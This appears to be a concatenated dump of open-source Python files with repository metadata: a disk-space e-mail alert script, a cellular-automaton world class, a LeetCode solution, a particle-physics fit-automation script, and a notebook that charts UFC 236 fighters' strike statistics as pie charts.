    """
    # %-formatting alone is sufficient; the original additionally wrapped
    # each string in the built-in format(), which is a no-op on a str.
    message = ("Hello,\nFree disk space on %r is dangerously low. Please free some disk space urgently.\n The current stats are:\ntotal: %r GB used: %r GB free: %r GB" % (machine, dsf[0], dsf[1], dsf[2]))
    msg = MIMEText(message)
    msg['Subject'] = "ALERT: Disk space low on %r" % (machine)
    msg['From'] = username
    # Header wants a single comma-separated string, not a list.
    msg['To'] = ','.join(recipients)
    return msg
def sendDiskFullMail(dsf,recipients,machine):
    """Send the low-disk-space alert through Gmail's SMTP relay.

    dsf        -- disk stats sequence: (total, used, free), in GB
    recipients -- list of recipient e-mail addresses
    machine    -- name of the host whose disk is filling up
    """
    msg = prepareMessage(dsf,recipients,machine)
    s = smtplib.SMTP("smtp.gmail.com", 587)
    # try/finally closes the connection even when STARTTLS, login or
    # sendmail raises (the original leaked the socket on any error).
    try:
        s.ehlo()
        s.starttls()
        # RFC 3207: the client must re-identify itself after STARTTLS.
        s.ehlo()
        s.login(username,password)
        s.sendmail(username, recipients, msg.as_string())
    finally:
        s.quit()
| [
"panshul007@gmail.com"
] | panshul007@gmail.com |
464dacbd4160b496abd2b05b0b7cff5ece2cfc0f | ce12cb8d9fb809d6d06cca035912bafebc3cd91f | /src/world.py | 2fce2cf0eb13e298f1aca8dfcdacf21258b27d6c | [
"MIT"
] | permissive | dapaulid/life | 287bd2476efccb585e8deee9671a2096a818007f | 365e717f4080b1a1439767d5119dfca0a15d194b | refs/heads/master | 2023-03-09T12:47:59.562809 | 2021-02-18T19:42:02 | 2021-02-18T19:42:02 | 297,053,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,940 | py | # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
"""
@license
Copyright (c) Daniel Pauli <dapaulid@gmail.com>
This source code is licensed under the MIT license found in the
LICENSE file in the root directory of this source tree.
"""
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# imports
#-------------------------------------------------------------------------------
#
import np
from statistic import TimingStat
import sys
#-------------------------------------------------------------------------------
# class definition
#-------------------------------------------------------------------------------
#
class World:
#---------------------------------------------------------------------------
# constants
#---------------------------------------------------------------------------
#
## default world radius if ommitted in constructor
DEFAULT_RADIUS = 100
#---------------------------------------------------------------------------
# functions
#---------------------------------------------------------------------------
#
#---------------------------------------------------------------------------
## constructor
def __init__(self, rule, radius=DEFAULT_RADIUS, metrics=[]):
self.radius = radius
self.rule = rule
self.diameter = radius * 2 + 1
self.size = self.diameter**2
self.reset()
self.metrics = [Metric(self) for Metric in metrics]
# end function
#---------------------------------------------------------------------------
## resets the world to its initial state.
def reset(self):
# big bang initial conditions
self.time = 0
self.cells = np.zeros((self.diameter, self.diameter), dtype=int) # TODO type affects performace?
self.cells[self.radius, self.radius] = 1
# matrix with indices into rule array of last tick
self.trans_idx = None
# statistics
self.tick_stat = TimingStat()
# end function
#---------------------------------------------------------------------------
## advances the world to its next state.
def tick(self):
self.tick_stat.start()
# apply the rule
self.cells, self.trans_idx = self.rule.apply(self.cells)
# advance time
self.time += 1
self.tick_stat.stop()
# end function
#---------------------------------------------------------------------------
## advances the world over multiple states.
def advance(self, ticks=1, silent=False):
# execute specified number of ticks
while ticks > 0:
self.tick()
ticks -= 1
# periodically update status
if self.time % 1000 == 0 or ticks == 0:
# calculate metrics
for m in self.metrics:
m.update()
# output status
if not silent:
print(self)
# end if
# end if
# end if
# end function
# get hash of the current cell configuration
def hash(self):
h = hash(self.cells.tostring())
# ensure h is nonnegative
h %= (sys.maxsize + 1) * 2
return "%016x" % h
# end function
#---------------------------------------------------------------------------
## returns the current number of cells of each state
def get_population(self):
return np.unique(self.cells, return_counts=True)[1] / self.cells.size
# end function
def __str__(self):
return ("[tick %d] " % self.time) + ", ".join(map(str, self.metrics))
# end function
# end class
#-------------------------------------------------------------------------------
# end of file
| [
"dapaulid@gmail.com"
] | dapaulid@gmail.com |
fb47a23ad30dfd0ef95a58c450969c5796386e1e | d83f50302702d6bf46c266b8117514c6d2e5d863 | /wiggle-sort-ii.py | 4e805ab4c2cb628a233a145c8732759446925784 | [] | no_license | sfdye/leetcode | 19764a6bdb82de114a2c82986864b1b2210c6d90 | afc686acdda4168f4384e13fb730e17f4bdcd553 | refs/heads/master | 2020-03-20T07:58:52.128062 | 2019-05-05T08:10:41 | 2019-05-05T08:10:41 | 137,295,892 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | py | class Solution:
def wiggleSort(self, nums):
"""
:type nums: List[int]
:rtype: void Do not return anything, modify nums in-place instead.
"""
for i, num in enumerate(sorted(nums)[::-1]):
nums[(i * 2 + 1) % (len(nums) | 1)] = num
| [
"tsfdye@gmail.com"
] | tsfdye@gmail.com |
a3f237e9944a7da0d2641a690d8c8a7b759a9236 | 5d93d415c50b5e7084eed8ebb23781745d744524 | /runStatisticsChecksUnblinded.py | 17122e4df29ec94ea5e8873a882a8bff3126d236 | [] | no_license | tanmaymudholkar/STEALTH | f32cae991ee6714e22b062c66fc0c6edc794b042 | 5bd797f4e432b0b3a08f157f4fe1c94391243af4 | refs/heads/master | 2023-07-19T08:18:20.475132 | 2023-07-08T04:07:13 | 2023-07-08T04:07:13 | 107,295,543 | 0 | 1 | null | 2017-10-17T16:28:32 | 2017-10-17T16:28:32 | null | UTF-8 | Python | false | false | 5,866 | py | #!/usr/bin/env python
from __future__ import print_function, division
import os, sys, argparse, subprocess, math
import ROOT
import stealthEnv, commonFunctions
ROOT.gROOT.SetBatch(ROOT.kTRUE)
ROOT.TH1.AddDirectory(ROOT.kFALSE)
inputArgumentsParser = argparse.ArgumentParser(description='Plot impacts of each nuisance parameter given a datacard.')
inputArgumentsParser.add_argument('--outputFolder', required=True, help='Path to folder in which to store output files.',type=str)
inputArgumentsParser.add_argument('--datacardTemplateParentFolderWithPrefix', required=True, help='Path to EOS folder (including xrootd prefix) from which to fetch datacard.',type=str)
inputArgumentsParser.add_argument('--datacardTemplateFileName', required=True, help='Name of datacard.',type=str)
inputArgumentsParser.add_argument('--identifier', required=True, help='Human-readable ID for the output.',type=str)
inputArguments = inputArgumentsParser.parse_args()
# If "identifier" contains anything other than a letter from the alphabet, it can't be used in a TeX macro
if not((inputArguments.identifier).isalpha()): sys.exit("ERROR: argument \"identifier\" can only contain letters.")
output_folder = "{oF}/{i}".format(oF=inputArguments.outputFolder, i=inputArguments.identifier)
# Make sure output folder exists
if not(os.path.isdir(output_folder)): subprocess.check_call("mkdir -p {oF}".format(oF=output_folder), shell=True, executable="/bin/bash")
# Step 1: Copy datacard locally
stealthEnv.execute_in_env(commandToRun="cd {oF} && xrdcp --nopbar --force --path {iF}/{f} {f}".format(oF=output_folder, iF=inputArguments.datacardTemplateParentFolderWithPrefix, f=inputArguments.datacardTemplateFileName))
# Need to add the line "shapes * * FAKE" to "fake" a shape analysis, because that is required by the FitDiagnostics tool
stealthEnv.execute_in_env(commandToRun="cd {oF} && sed -i '/number of nuisance parameters/a shapes * * FAKE' {f}".format(oF=output_folder, f=inputArguments.datacardTemplateFileName))
# Step 2: Run FitDiagnostics
stealthEnv.execute_in_env(commandToRun="cd {oF} && combine -M FitDiagnostics --robustFit 1 --rMin -10 --expectSignal 0 --saveShapes --saveWithUncertainties --plots -d {f}".format(oF=output_folder, f=inputArguments.datacardTemplateFileName))
# Step 3: Get best-fit value of r and write it out to a TeX file
r_bestfit, r_error_lo, r_error_hi = commonFunctions.get_r_from_fit_diagnostics_output(input_file_path="{oF}/fitDiagnostics.root".format(oF=output_folder), printDebug=False)
output_tex_file_r_bestfit = open("{oF}/r_best_fit_{i}.tex".format(oF=output_folder, i=inputArguments.identifier), 'w')
output_tex_file_r_bestfit.write("\\providecommand{{\\BestFitR{i}}}{{Best fit $r$: {r_bestfit:.4G}~~-{r_error_lo:.3f}/+{r_error_hi:.3f}~~(68\\% CL)}}\n".format(i=inputArguments.identifier, r_bestfit=r_bestfit, r_error_lo=r_error_lo, r_error_hi=r_error_hi))
output_tex_file_r_bestfit.close()
# Step 4: Get pulls of nuisances using the standard "diffNuisances.py" script
stealthEnv.execute_in_env(commandToRun="cd {oF} && python ${{CMSSW_BASE}}/src/HiggsAnalysis/CombinedLimit/test/diffNuisances.py -a fitDiagnostics.root > {oF}/diffNuisances_{i}_raw.txt 2>&1".format(oF=output_folder, i=inputArguments.identifier))
# Step 5: Write out output of diffNuisances verbatim into a TeX file
commonFunctions.write_diffNuisances_output_into_tex_file(input_file_path="{oF}/diffNuisances_{i}_raw.txt".format(oF=output_folder, i=inputArguments.identifier), output_file_path="{oF}/diffNuisances_{i}.tex".format(oF=output_folder, i=inputArguments.identifier))
# Step 6: Create Combine workspace from datacard
stealthEnv.execute_in_env(commandToRun="cd {oF} && text2workspace.py {f} -m 125".format(oF=output_folder, f=inputArguments.datacardTemplateFileName))
workspace_path = "{oF}/{f}".format(oF=output_folder, f=(inputArguments.datacardTemplateFileName).replace(".txt", ".root"))
print("Produced workspace at: {w}".format(w=workspace_path))
if not(os.path.exists(workspace_path)): sys.exit("ERROR: expected to find file at location {w}, but found none.".format(w=workspace_path))
# Step 7: do initial fit to parameters of interest (just signal strength in our case) with --doInitialFit
stealthEnv.execute_in_env(commandToRun="cd {oF} && combineTool.py -M Impacts -d {w} -m 125 --doInitialFit --robustFit 1 --expectSignal 0 --rMin -10".format(oF=output_folder, w=workspace_path))
# Step 8: fit for each nuisance parameter with --doFits
stealthEnv.execute_in_env(commandToRun="cd {oF} && combineTool.py -M Impacts -d {w} -m 125 --robustFit 1 --doFits --expectSignal 0 --rMin -10 --parallel 12".format(oF=output_folder, w=workspace_path))
# Step 9: Collate outputs and write impacts into a json file
stealthEnv.execute_in_env(commandToRun="cd {oF} && combineTool.py -M Impacts -d {w} -m 125 --expectSignal 0 --rMin -10 -o impacts.json".format(oF=output_folder, w=workspace_path))
# Step 10: Make the impact plots
stealthEnv.execute_in_env(commandToRun="cd {oF} && plotImpacts.py -i impacts.json -o impacts_{i} --label-size 0.04 --left-margin 0.55 --height 500 --per-page 21".format(oF=output_folder, i=inputArguments.identifier))
# Step 11: Rerun FitDiagnostics with extra plots
stealthEnv.execute_in_env(commandToRun="cd {oF} && combine -M FitDiagnostics --robustFit 1 --rMin -10 --expectSignal 0 --saveWithUncertainties --saveOverallShapes --numToysForShapes 200 --plots -d {f}".format(oF=output_folder, f=inputArguments.datacardTemplateFileName))
# Step 12: Save high-res versions of 2D correlation plots, and print important values
commonFunctions.print_and_save_high_res_correlations(input_file_path="{oF}/fitDiagnostics.root".format(oF=output_folder), output_folder=output_folder, suffix=inputArguments.identifier, list_correlations_to_save=["correlation_b", "correlation_s", "correlation_bins_b", "correlation_bins_s"])
print("All done!")
| [
"tkmudholkar@gmail.com"
] | tkmudholkar@gmail.com |
79752c6d98e09fffc733bd35034d18f7c28d8349 | 9251e4c4a2c683a3c09592fc51bb946fdd80f024 | /UFCTrainingStats (1).py | 73e50ad5171fc58029cf814471d64f938c551f22 | [] | no_license | sparkey667/AnalyzingUFCStatsforUFC236 | 8bc6e87cd74433bb5a88a7fc35644f080423ddb5 | 4354028c23be90d94cdb722c459af20a6f9dcdc8 | refs/heads/master | 2020-05-07T20:29:59.269492 | 2019-04-18T15:24:32 | 2019-04-18T15:24:32 | 180,863,771 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 55,223 | py | #!/usr/bin/env python
# coding: utf-8
# Name = "Dheric Seney"
# # UFC Statistics for Training
#
# https://www.itbusiness.ca/news/former-ufc-fighter-says-data-analytics-should-be-used-in-mma/77375
#
# Data Analytics is not used a lot in UFC. Most fighters are training for their strengths and not necessary to defeat their opponent. Using Data Science / Data Analytics, fighters could train certain styles / techniques in order to get an upper hand against their opponent
#
# Objective: Based on the fighters who will be fighting in UFC: 236, I will analyze each fighter's past fights and predict what they will do in the incoming PPV event
# The Data set that was retrieved for this project was from http://ufcstats.com/statistics/events/completed
# The data includeds:
# - 10 fighters fighting in the Main Card of UFC 236
# - 5 rounds of Data
# - if the fight did not last 5 rounds because it was a 3 round fight or a fighter was KO'd or submitted, 0's were placed for the rounds
# - Attempts of Significant Strikes (Head, body, leg, distance, ground, clinch)
# - Lands of Significant Stikes (Head, body, leg, distance, ground, clinch)
# In[1]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# Load the per-round fight statistics scraped from
# http://ufcstats.com/statistics/events/completed into a DataFrame.
file = pd.read_csv('UFC_Rounds(extra).csv')
# In[2]:
# set up csv file to jupyter and checks to see if there is stuff
print(file.columns)
# print(file.tail(17))
# print(pd.DataFrame(file))
# file.iloc[49:]
# In[3]:
# file = file.drop(file.iloc[49:],axis=0)
# Drop the last 17 rows -- presumably extra / non-main-card rows appended
# to the CSV (see the tail(17) check above).  TODO confirm against the raw file.
file = file[:-17]
print(file)
# # Main Card
#
# The main card: (wins-losses-draws)
#
# Max Holloway (20 - 3 - 0) vs Dustin Poirier (24-5-0)
# Kelvin Gastelum (16-3-0) vs Israel Adesanya (16-0-0)
# Eryk Anders (11-3-0) vs Khalil Rountree Jr. (7-3-0)
# Alan Jouban (16-6-0) vs Dwight Grant (9-2-0)
# Ovince Saint Preux (23-12-0) vs Nikita Krylov (24-6-0)
#
#
# getFighterStats() takes an input of the fighter name and the file name. It returns a list/ dataframe of the previous fights the fighter was in and the stats from them
# In[4]:
def getFighterStats(name,file):
    """Return every row of *file* whose 'Name' column equals *name*.

    *name* is the fighter's name exactly as it appears in the CSV and
    *file* is the DataFrame of per-round fight statistics; the result is
    a DataFrame holding that fighter's past fights.
    """
    # Boolean-mask selection keeps all recorded fights for this fighter.
    return file.loc[file['Name'] == name]
# In[5]:
# Set's tables for each fighter
Holloway = getFighterStats('Max Holloway', file)
Poirier = getFighterStats('Dustin Poirier', file)
Gastelum = getFighterStats('Kelvin Gastelum',file)
Adesanya = getFighterStats('Israel Adesanya',file)
Anders = getFighterStats('Eryk Anders',file)
RountreeJr = getFighterStats('Khalil Rountree Jr.',file)
Jouban = getFighterStats('Alan Jouban',file)
Grant = getFighterStats('Dwight Grant',file)
Preux = getFighterStats('Saint Preux',file)
Krylov = getFighterStats('Nikita Krylov',file)
# In[6]:
print(Holloway)
print(Poirier)
print(Gastelum)
print(Adesanya)
print(Anders)
print(RountreeJr)
print(Jouban)
print(Grant)
print(Preux)
print(Krylov)
# type(Poirier)
# GetRoundStats()
# - Input: takes two inputts: he fighter's previous fights and stats variable created from getFighterStats() and the specific round that you want the stats for
# - Purpose: Takes the mean for each column so its one row
# - Output: outputs the row of stats for the specified round
# In[7]:
def getRoundStats(name,r):
if r == 1:
roundOne = name[name.columns[3:15]]
stats1 = np.mean(roundOne)
return pd.DataFrame(stats1)
elif r == 2:
roundTwo = name[name.columns[15:27]]
stats2 = np.mean(roundTwo)
return pd.DataFrame(stats2)
elif r == 3:
roundThree = name[name.columns[27:39]]
stats3 = np.mean(roundThree)
return pd.DataFrame(stats3)
elif r == 4:
roundFour = name[name.columns[39:51]]
stats4 = np.mean(roundFour)
return pd.DataFrame(stats4)
elif r == 5:
roundFive = name[name.columns[51::]]
stats5 = np.mean(roundFive)
return pd.DataFrame(stats5)
else:
return 'choose a round between 1 to 5'
# category()
# - input: Takes two variables. The name of the Fighter and the specific stat needed
# - n = normal
# - d = distance
# - c = clinch
# - g = ground
# - Purpose: takes the sum of the columns for the specific categorical stat needed. The calculation is done on landed not attempts
# - Output: returns the total number for the categorical stat
# In[8]:
def category(name,stat):
    """Sum the *landed* significant strikes of one category for a round.

    Parameters
    ----------
    name : pandas.DataFrame
        Single-column frame returned by getRoundStats().  Positions
        alternate attempt/landed, ordered head, body, leg, distance,
        clinch, ground (so odd positions are "landed" counts).
    stat : str
        'n' = normal (head + body + leg), 'd' = distance, 'c' = clinch,
        'g' = ground.

    Returns
    -------
    The landed-strike total for the category, or the string 'wrong stat'
    for an unknown code (kept for backward compatibility).
    """
    # Explicit positional access replaces the original's opaque step-2
    # slices (e.g. [7:8:2]), which each selected a single element anyway.
    col = name.iloc[:, 0]
    if stat == 'n':
        # head (1) + body (3) + leg (5) landed, rounded as displayed.
        return col.iloc[[1, 3, 5]].sum().round(1)
    elif stat == 'd':
        return col.iloc[7]   # distance landed
    elif stat == 'c':
        return col.iloc[9]   # clinch landed
    elif stat == 'g':
        return col.iloc[11]  # ground landed
    else:
        return 'wrong stat'
# In[9]:
# Sanity check: average Holloway's round-3 columns, then pull the total
# ground strikes landed from that round.
H_stats = getRoundStats(Holloway,3)
print(H_stats)
# H_stats[0][9:11:2]
category(H_stats,'g')
# clinch = getClinch(H_stats,1)
# print("total", clinch)
# distance = getDistance(H_stats,1)
# print("total", distance)
# ground = getGround(H_stats,1)
# print("total", ground,)
# normal = getNormal(H_stats,1)
# print("total", normal)
# In[10]:
# labels = 'Clinch','Distance','Ground','Normal'
# sizes = [getClinch(getRoundStats(Holloway,1),1), getDistance(getRoundStats(Holloway,1),1), getGround(getRoundStats(Holloway,1),1), getNormal(getRoundStats(Holloway,1),1)]
# colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
# explode = (0, 0, 0, 0)
# # Plot
# plt.pie(sizes, explode=explode, labels=labels, colors=colors,
# autopct='%1.1f%%', shadow=True, startangle=140)
# plt.axis('equal')
# plt.show()
# # Stats per round
#
# This section finds specific stats per each fighter per round. After getting the stats, the stats are placed in a pie chart so a fighter can use this data to know what their opponent is most likely going to do.
#
# The rounds calculated are rounds 1, 2, 3. Rounds 4 and 5 were left out due to not all fighters making it to 5 rounds.
# # Round 1
# Max Holloway (20 - 3 - 0) vs Dustin Poirier (24-5-0) : Round 1
# In[11]:
# ---------------------------------------------------------------------------
# Stats per round
#
# For each UFC 236 main-card matchup, draw side-by-side pie charts of where
# each fighter's landed significant strikes come from (normal = head/body/leg,
# clinch, distance, ground), averaged per round.  Rounds 4 and 5 are omitted
# because not every fighter has data for them.
# ---------------------------------------------------------------------------

# Shared label/color scheme; the sizes built in _plot_fighter_pie() must
# follow this same n/c/d/g order or the slices are silently mislabeled.
_PIE_LABELS = ('Normal', 'Clinch', 'Distance', 'Ground')
_PIE_COLORS = ('lightsteelblue', 'yellowgreen', 'plum', 'lightcoral')


def _plot_fighter_pie(subplot_pos, fighter, display_name, rnd):
    """Draw one fighter's strike-category pie for round *rnd* at *subplot_pos*."""
    plt.subplot(subplot_pos)
    plt.title('%s Round %d' % (display_name, rnd))
    stats = getRoundStats(fighter, rnd)
    # Keep this order aligned with _PIE_LABELS: n, c, d, g.
    sizes = [category(stats, 'n'), category(stats, 'c'),
             category(stats, 'd'), category(stats, 'g')]
    plt.pie(sizes, explode=(0, 0, 0, 0), labels=_PIE_LABELS,
            colors=_PIE_COLORS, autopct='%1.1f%%', shadow=True,
            startangle=140)
    plt.axis('equal')


def _plot_matchup(fighter1, name1, fighter2, name2, rnd):
    """Draw a matchup's two pie charts side by side for round *rnd*."""
    # Fresh figure per matchup (matches the original one-figure-per-cell
    # notebook behavior).
    plt.figure()
    _plot_fighter_pie(221, fighter1, name1, rnd)
    _plot_fighter_pie(222, fighter2, name2, rnd)
    # BUG FIX: the original ended each cell with a bare `plt.show`
    # (attribute access, never called); actually call it here.
    plt.show()


# The five UFC 236 main-card matchups (fighter table, display name).
_MATCHUPS = [
    (Holloway, 'Max Holloway', Poirier, 'Dustin Poirier'),
    (Gastelum, 'Kelvin Gastelum', Adesanya, 'Israel Adesanya'),
    (Anders, 'Eryk Anders', RountreeJr, 'Khalil Rountree Jr'),
    (Jouban, 'Alan Jouban', Grant, 'Dwight Grant'),
    (Preux, 'Ovince Saint Preux', Krylov, 'Nikita Krylov'),
]

# Rounds 1-3 for every matchup.  NOTE: this also fixes the original Nikita
# Krylov round-1 chart, where the sizes were passed in n,d,c,g order against
# Normal/Clinch/Distance/Ground labels, swapping the Distance/Clinch slices.
for _rnd in (1, 2, 3):
    for _f1, _n1, _f2, _n2 in _MATCHUPS:
        _plot_matchup(_f1, _n1, _f2, _n2, _rnd)
# # Totals
#
# Instead of getting statistics per round, Totals sums the stats of rounds
# 1-3 into a single figure per fighter so opponents can be compared.
# In[26]:
def _round_totals(fighter):
    """Sum rounds 1-3 of *fighter*'s stats for each strike location.

    Returns a (normal, distance, clinch, ground) tuple, each value
    rounded to 1 decimal place -- the same order the per-fighter
    *Normal/*Distance/*Clinch/*Ground variables are assigned below.
    """
    return tuple(
        (category(getRoundStats(fighter, 1), key)
         + category(getRoundStats(fighter, 2), key)
         + category(getRoundStats(fighter, 3), key)).round(1)
        for key in ('n', 'd', 'c', 'g')
    )


# Holloway
HNormal, HDistance, HClinch, HGround = _round_totals(Holloway)
print(HNormal, HDistance, HClinch, HGround)
# Poirier
PNormal, PDistance, PClinch, PGround = _round_totals(Poirier)
print(PNormal, PDistance, PClinch, PGround)
# Gastelum
GNormal, GDistance, GClinch, GGround = _round_totals(Gastelum)
print(GNormal, GDistance, GClinch, GGround)  # added: the original never printed Gastelum's totals
# Adesanya
ANormal, ADistance, AClinch, AGround = _round_totals(Adesanya)
print(ANormal, ADistance, AClinch, AGround)
# Anders
AnNormal, AnDistance, AnClinch, AnGround = _round_totals(Anders)
print(AnNormal, AnDistance, AnClinch, AnGround)
# RountreeJr
RNormal, RDistance, RClinch, RGround = _round_totals(RountreeJr)
print(RNormal, RDistance, RClinch, RGround)
# Jouban
JNormal, JDistance, JClinch, JGround = _round_totals(Jouban)
print(JNormal, JDistance, JClinch, JGround)
# Grant
GrNormal, GrDistance, GrClinch, GrGround = _round_totals(Grant)
print(GrNormal, GrDistance, GrClinch, GrGround)  # fixed: original re-printed Poirier's values here
# Preux
PrNormal, PrDistance, PrClinch, PrGround = _round_totals(Preux)
print(PrNormal, PrDistance, PrClinch, PrGround)
# Krylov
KNormal, KDistance, KClinch, KGround = _round_totals(Krylov)
print(KNormal, KDistance, KClinch, KGround)
def _pie_pair(left_title, left_sizes, right_title, right_sizes):
    """Render one figure with two side-by-side strike-location pie charts.

    Each sizes list must be ordered Clinch, Distance, Ground, Normal to
    match the shared label tuple.
    """
    labels = 'Clinch', 'Distance', 'Ground', 'Normal'
    colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
    for position, title, sizes in ((221, left_title, left_sizes),
                                   (222, right_title, right_sizes)):
        plt.subplot(position)
        plt.title(title)
        plt.pie(sizes, explode=(0, 0, 0, 0), labels=labels, colors=colors,
                autopct='%1.1f%%', shadow=True, startangle=140)
        plt.axis('equal')
    plt.figure(1)
    plt.show()  # fixed: original had `plt.show` (no call) after every figure


# Max Holloway (20 - 3 - 0) vs Dustin Poirier (24-5-0) : Total
# In[27]:
_pie_pair('Max Holloway Total', [HClinch, HDistance, HGround, HNormal],
          'Dustin Poirier Total', [PClinch, PDistance, PGround, PNormal])
# Kelvin Gastelum (16-3-0) vs Israel Adesanya (16-0-0) : Total
# In[28]:
_pie_pair('Kelvin Gastelum Total', [GClinch, GDistance, GGround, GNormal],
          'Israel Adesanya Total', [AClinch, ADistance, AGround, ANormal])
# Eryk Anders (11-3-0) vs Khalil Rountree Jr. (7-3-0) : Total
# In[29]:
_pie_pair('Eryk Anders Total', [AnClinch, AnDistance, AnGround, AnNormal],
          'Khalil Rountree Jr Total', [RClinch, RDistance, RGround, RNormal])
# Alan Jouban (16-6-0) vs Dwight Grant (9-2-0) : Total
# In[30]:
_pie_pair('Alan Jouban Total', [JClinch, JDistance, JGround, JNormal],
          'Dwight Grant Total', [GrClinch, GrDistance, GrGround, GrNormal])
# Ovince Saint Preux (23-12-0) vs Nikita Krylov (24-6-0) : Total
# In[31]:
_pie_pair('Ovince Saint Preux Total', [PrClinch, PrDistance, PrGround, PrNormal],
          'Nikita Krylov Total', [KClinch, KDistance, KGround, KNormal])
# # Results
#
# On April 13th, UFC 236 took place. The data from the fights were recorded into an alike table to the first table that was used. With the data, the same process was made by creating pie charts using the data.
# In[32]:
# NOTE(review): 'UFC_Winenrs.csv' looks misspelled ('Winners'?) -- presumably it
# matches the actual file name on disk; confirm before renaming either.
results = pd.read_csv('UFC_Winenrs.csv')
# print(results.columns)
print(results)
# Drop the row at index 10 -- presumably a non-fight/summary row in the CSV;
# TODO confirm against the source file.
results = results.drop([10], axis = 0)
print(results)
# In[33]:
# Per-fighter slices of the UFC 236 results table (same helper used for the
# historical data earlier in the file).
Results_Holloway = getFighterStats('Max Holloway', results)
Results_Poirier = getFighterStats('Dustin Poirier', results)
Results_Gastelum = getFighterStats('Kelvin Gastelum',results)
Results_Adesanya = getFighterStats('Israel Adesanya',results)
Results_Anders = getFighterStats('Eryk Anders',results)
Results_RountreeJr = getFighterStats('Khalil Rountree Jr.',results)
Results_Jouban = getFighterStats('Alan Jouban',results)
Results_Grant = getFighterStats('Dwight Grant',results)
# NOTE(review): partial name ('Saint Preux', not 'Ovince Saint Preux') --
# presumably matches how the results CSV spells it; verify.
Results_Preux = getFighterStats('Saint Preux',results)
Results_Krylov = getFighterStats('Nikita Krylov',results)
# In[34]:
# Same rounds-1..3 summation as the career totals above, applied to the
# UFC 236 results tables.
def _round_totals(fighter):
    """Sum rounds 1-3 of *fighter*'s stats for each strike location.

    Returns a (normal, distance, clinch, ground) tuple, each value
    rounded to 1 decimal place -- the same order the per-fighter
    *Normal/*Distance/*Clinch/*Ground variables are assigned below.
    """
    return tuple(
        (category(getRoundStats(fighter, 1), key)
         + category(getRoundStats(fighter, 2), key)
         + category(getRoundStats(fighter, 3), key)).round(1)
        for key in ('n', 'd', 'c', 'g')
    )


# Holloway
Results_HNormal, Results_HDistance, Results_HClinch, Results_HGround = _round_totals(Results_Holloway)
print(Results_HNormal, Results_HDistance, Results_HClinch, Results_HGround)
# Poirier
Results_PNormal, Results_PDistance, Results_PClinch, Results_PGround = _round_totals(Results_Poirier)
print(Results_PNormal, Results_PDistance, Results_PClinch, Results_PGround)
# Gastelum
Results_GNormal, Results_GDistance, Results_GClinch, Results_GGround = _round_totals(Results_Gastelum)
print(Results_GNormal, Results_GDistance, Results_GClinch, Results_GGround)
# Adesanya
Results_ANormal, Results_ADistance, Results_AClinch, Results_AGround = _round_totals(Results_Adesanya)
print(Results_ANormal, Results_ADistance, Results_AClinch, Results_AGround)
# Anders
Results_AnNormal, Results_AnDistance, Results_AnClinch, Results_AnGround = _round_totals(Results_Anders)
print(Results_AnNormal, Results_AnDistance, Results_AnClinch, Results_AnGround)
# RountreeJr
Results_RNormal, Results_RDistance, Results_RClinch, Results_RGround = _round_totals(Results_RountreeJr)
print(Results_RNormal, Results_RDistance, Results_RClinch, Results_RGround)
# Jouban
Results_JNormal, Results_JDistance, Results_JClinch, Results_JGround = _round_totals(Results_Jouban)
print(Results_JNormal, Results_JDistance, Results_JClinch, Results_JGround)
# Grant
Results_GrNormal, Results_GrDistance, Results_GrClinch, Results_GrGround = _round_totals(Results_Grant)
print(Results_GrNormal, Results_GrDistance, Results_GrClinch, Results_GrGround)  # fixed: original re-printed Poirier's results here
# Preux
Results_PrNormal, Results_PrDistance, Results_PrClinch, Results_PrGround = _round_totals(Results_Preux)
print(Results_PrNormal, Results_PrDistance, Results_PrClinch, Results_PrGround)
# Krylov
Results_KNormal, Results_KDistance, Results_KClinch, Results_KGround = _round_totals(Results_Krylov)
print(Results_KNormal, Results_KDistance, Results_KClinch, Results_KGround)
def _pie_pair(left_title, left_sizes, right_title, right_sizes):
    """Render one figure with two side-by-side strike-location pie charts.

    Each sizes list must be ordered Clinch, Distance, Ground, Normal to
    match the shared label tuple.
    """
    labels = 'Clinch', 'Distance', 'Ground', 'Normal'
    colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
    for position, title, sizes in ((221, left_title, left_sizes),
                                   (222, right_title, right_sizes)):
        plt.subplot(position)
        plt.title(title)
        plt.pie(sizes, explode=(0, 0, 0, 0), labels=labels, colors=colors,
                autopct='%1.1f%%', shadow=True, startangle=140)
        plt.axis('equal')
    plt.figure(1)
    plt.show()  # fixed: original had `plt.show` (no call) after every figure


# Max Holloway (20 - 3 - 0) vs Dustin Poirier (24-5-0) : Results
# In[35]:
_pie_pair('Max Holloway Results',
          [Results_HClinch, Results_HDistance, Results_HGround, Results_HNormal],
          'Dustin Poirier Results',
          [Results_PClinch, Results_PDistance, Results_PGround, Results_PNormal])
# Kelvin Gastelum (16-3-0) vs Israel Adesanya (16-0-0) : Result
# In[36]:
_pie_pair('Kelvin Gastelum Results',
          [Results_GClinch, Results_GDistance, Results_GGround, Results_GNormal],
          'Israel Adesanya Results',
          [Results_AClinch, Results_ADistance, Results_AGround, Results_ANormal])
# Eryk Anders (11-3-0) vs Khalil Rountree Jr. (7-3-0) : Result
# In[37]:
_pie_pair('Eryk Anders Results',
          [Results_AnClinch, Results_AnDistance, Results_AnGround, Results_AnNormal],
          'Khalil Rountree Jr Results',
          [Results_RClinch, Results_RDistance, Results_RGround, Results_RNormal])
# Alan Jouban (16-6-0) vs Dwight Grant (9-2-0) ; Result
# In[38]:
_pie_pair('Alan Jouban Results',
          [Results_JClinch, Results_JDistance, Results_JGround, Results_JNormal],
          'Dwight Grant Results',
          [Results_GrClinch, Results_GrDistance, Results_GrGround, Results_GrNormal])
# Ovince Saint Preux (23-12-0) vs Nikita Krylov (24-6-0) : Result
# In[39]:
_pie_pair('Ovince Saint Preux Results',
          [Results_PrClinch, Results_PrDistance, Results_PrGround, Results_PrNormal],
          'Nikita Krylov Results',
          [Results_KClinch, Results_KDistance, Results_KGround, Results_KNormal])
def _pie_pair(left_title, left_sizes, right_title, right_sizes):
    """Render one figure with two side-by-side strike-location pie charts.

    Each sizes list must be ordered Clinch, Distance, Ground, Normal to
    match the shared label tuple.
    """
    labels = 'Clinch', 'Distance', 'Ground', 'Normal'
